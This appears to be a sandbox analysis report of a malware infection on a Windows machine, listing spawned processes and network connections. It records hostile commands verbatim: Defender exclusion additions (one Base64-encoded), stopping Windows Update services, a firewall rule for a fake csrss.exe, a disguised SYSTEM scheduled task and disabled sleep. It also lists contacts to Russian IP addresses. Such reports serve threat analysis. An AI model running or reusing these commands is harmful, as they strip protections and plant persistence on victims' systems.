"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb7f5746f8,0x7ffb7f574708,0x7ffb7f574718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb7f5746f8,0x7ffb7f574708,0x7ffb7f574718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2LX2769.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2LX2769.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6436 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7332 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7184 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Cm46eE.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Cm46eE.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3312 -ip 3312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 540
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8212 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8212 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8nW268RB.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8nW268RB.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9Bx9pp4.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9Bx9pp4.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\1786.exe
C:\Users\Admin\AppData\Local\Temp\1786.exe
C:\Users\Admin\AppData\Local\Temp\1881.exe
C:\Users\Admin\AppData\Local\Temp\1881.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7f5746f8,0x7ffb7f574708,0x7ffb7f574718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,2276606683787265801,6946806837333604447,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,2276606683787265801,6946806837333604447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,2276606683787265801,6946806837333604447,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,2276606683787265801,6946806837333604447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,2276606683787265801,6946806837333604447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\51E1.exe
C:\Users\Admin\AppData\Local\Temp\51E1.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,2276606683787265801,6946806837333604447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\55CA.exe
C:\Users\Admin\AppData\Local\Temp\55CA.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,2276606683787265801,6946806837333604447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\5984.exe
C:\Users\Admin\AppData\Local\Temp\5984.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\55CA.exe
C:\Users\Admin\AppData\Local\Temp\55CA.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,2276606683787265801,6946806837333604447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,2276606683787265801,6946806837333604447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,2276606683787265801,6946806837333604447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,2276606683787265801,6946806837333604447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3840 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,2276606683787265801,6946806837333604447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3840 /prefetch:8
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Users\Admin\AppData\Local\Temp\1AE1.exe
C:\Users\Admin\AppData\Local\Temp\1AE1.exe
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | 35.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.49.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.epicgames.com | udp |
| US | 8.8.8.8:53 | store.steampowered.com | udp |
| US | 34.232.30.48:443 | www.epicgames.com | tcp |
| NL | 104.85.0.101:443 | store.steampowered.com | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.0.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.30.232.34.in-addr.arpa | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 21.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.39.65.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.39.251.142.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| NL | 142.250.179.182:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 182.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | static-assets-prod.unrealengine.com | udp |
| US | 18.239.36.105:443 | static-assets-prod.unrealengine.com | tcp |
| US | 8.8.8.8:53 | www.paypalobjects.com | udp |
| US | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| US | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| US | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| US | 192.229.233.50:443 | pbs.twimg.com | tcp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 104.244.42.69:443 | t.co | tcp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| US | 192.229.220.133:443 | video.twimg.com | tcp |
| US | 8.8.8.8:53 | 25.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.36.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | community.akamai.steamstatic.com | udp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.72.252.163:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | tracking.epicgames.com | udp |
| US | 54.205.234.65:443 | tracking.epicgames.com | tcp |
| US | 8.8.8.8:53 | 50.233.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.220.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.252.72.23.in-addr.arpa | udp |
| US | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| US | 8.8.8.8:53 | 65.234.205.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.252.72.23.in-addr.arpa | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | 10.5.240.157.in-addr.arpa | udp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| US | 8.8.8.8:53 | store.akamai.steamstatic.com | udp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
| US | 8.8.8.8:53 | 171.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| RU | 5.42.92.51:19057 | tcp | |
| US | 8.8.8.8:53 | static.ads-twitter.com | udp |
| NL | 199.232.148.157:443 | static.ads-twitter.com | tcp |
| US | 8.8.8.8:53 | 157.148.232.199.in-addr.arpa | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| US | 194.49.94.72:80 | tcp | |
| US | 8.8.8.8:53 | 190.92.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | facebook.com | udp |
| US | 157.240.5.35:443 | facebook.com | tcp |
| US | 8.8.8.8:53 | 35.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fbcdn.net | udp |
| US | 157.240.5.35:443 | fbcdn.net | tcp |
| US | 8.8.8.8:53 | fbsbx.com | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| NL | 172.217.168.227:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | c.paypal.com | udp |
| US | 8.8.8.8:53 | 227.168.217.172.in-addr.arpa | udp |
| US | 192.55.233.1:443 | tcp | |
| NL | 172.217.168.227:443 | www.recaptcha.net | udp |
| US | 192.55.233.1:443 | tcp | |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| US | 8.8.8.8:53 | t.paypal.com | udp |
| US | 151.101.1.35:443 | t.paypal.com | tcp |
| US | 8.8.8.8:53 | 35.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | b.stats.paypal.com | udp |
| US | 64.4.245.84:443 | b.stats.paypal.com | tcp |
| US | 8.8.8.8:53 | 84.245.4.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dub.stats.paypal.com | udp |
| US | 64.4.245.84:443 | dub.stats.paypal.com | tcp |
